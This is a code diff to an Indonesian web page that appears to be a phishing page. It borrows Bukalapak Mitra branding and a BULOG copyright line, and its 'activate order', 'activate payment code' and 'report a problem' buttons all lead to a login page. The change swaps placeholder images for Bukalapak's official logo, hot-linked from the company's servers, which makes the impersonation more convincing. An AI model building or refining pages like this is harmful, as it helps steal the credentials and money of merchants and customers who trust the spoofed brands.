--- a/index.html
+++ b/index.html
@@ -1318,14 +1318,14 @@ body { font-family: AvenirMedium; color: var(--chakra-colors-chakra-body-text); 
                     <div class="css-1hvggs4">
                         <img src="">
                         </div>
-                           <b class="chakra-text css-arqxt3"></b><img src="https://raw.githubusercontent.com/in-id/login-mitra/main/IMG-20240905-WA0003(1).jpg" class="css-1v97jab"></div><div class="css-1meg77l"></div>
+                           <b class="chakra-text css-arqxt3"></b><img src="https://assets.bukalapak.com/daisy/compro/images/about/logo-mitra.png" class="css-1v97jab"></div><div class="css-1meg77l"></div>
             <section class="section">
                   <div class="container">
             <div class="" style="background-color: #fff; margin-left: 20px;margin-top: -260px;position:padding;border: 2px solid #00008B; padding: 30px; width: 92%; border-radius: 20px"><center style="color:#FFFAFA;font-size: 14px;"><span><b></b></span>
             <button class="btn-punya" onclick="location.href='login.html';">Aktifkan Pesanan</button>
             <button class="btn-punya" onclick="location.href='login.html';">Aktifkan Kode Pembayaran</button>
                         <button class="btn-punya" onclick="location.href='login.html';">Laporan Kendala</button></div></br>               <center>
-            <div class="css-dnzamn"><img src="img/logo-kliksphp.png" width="100"></div></center><br>
+            <div class="css-dnzamn"><img src="https://assets.bukalapak.com/daisy/compro/images/about/logo-mitra.png" width="100"></div></center><br>
 <h6 style="font-family: 'Nunito', sans-serif; font-size: 7px; font-weight: bold; color: #000; letter-spacing: 1px; text-align: center; line-height: 1; border-radius: 5px;">©  2024 Copyright © 2024 - Perum BULOG 
 
 .</h6>
